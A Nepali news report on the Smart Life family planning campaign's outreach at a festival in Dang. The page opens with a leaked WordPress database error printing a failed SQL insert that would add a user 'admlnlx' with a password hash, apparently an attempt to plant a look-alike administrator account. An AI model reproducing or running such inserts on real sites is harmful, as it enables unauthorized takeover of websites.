WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bk.pshG/Z62gNQtgcPmkHyA.iUjpwC/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 20:58:02', '', 'admlnlx', 'admlnlx')
दाङ, माघ २१–
नेपालको स्मार्ट जीवन (स्मार्ट लाइफ) परिवार नियोजन अभियानले तुलसीपुर चेम्बर अफ कमर्श एण्ड इण्डष्ट्रिजसँगको सहकार्यमा आज दाङ जिल्लामा आयोजित कृषि तथा पर्यटन प्रबद्र्धन तथा सांगीतिक महोत्सवमा स्वस्थ्य परिवारको प्रबद्र्धन सम्पन्न गरेको छ ।
स्थानीय स्वास्थ्य अधिकारीहरु तथा निजी क्षेत्रका संस्थाहरुसँको सहकार्यमा नेपालभरका लक्षित जिल्लाहरुमा स्मार्ट जीवनले युवा विवाहित जोडीहरुका बीचमा परिवार नियोजनको प्रयोगको माध्यमबाट स्वस्थ्य परिवारको प्रबद्र्धन गरेको थियो ।
यो अभियान, स्वास्थ्य मन्त्रालय अन्तर्गतको राष्ट्रिय स्वास्थ्य शिक्षा, सूचना तथा संचार केन्द्र, परिवार स्वास्थ्य विभागद्धारा यूएसएडको हेल्थ कम्यूनिकेसन क्यापासिटी कोल्याबोरेटिभ नेपाल प्रोजेक्टको सहयोगमा लागु गरिएको हो ।

दुई वर्षको अवधिमा, यो अभियान २ लाख ६३ हजार योग्य जोडीहरु सम्म पुगी सकेको छ र १३ जिल्लाका ५१ हजार भन्दा बढि जोडीहरुलाई परिवार नियोजन सेवाका लागि निर्देशित गरिसकेको छ ।
कार्यक्रममा सहभागीहरुले खाना, विभिन्न किसिमका सामाग्रीहरुको स्टल, कार्निभल गेम, प्रहशन, र सांगीतिक प्रस्तुतीको आनन्द लिएका थिए । जसले तिनिहरुको परिवारले सहि समयमा परिवार नियोजनको प्रयोगका लागि जोडीहरुलाई कसरी योजना बनाउने भनेर देखाएका थिए । विभिन्न जोडीहरु तथा परिवारहरुले कार्यक्रममा सहभागी भएर निःशुल्क रुपमा पारिवारीक फोटो प्राप्त गरेका थिए ।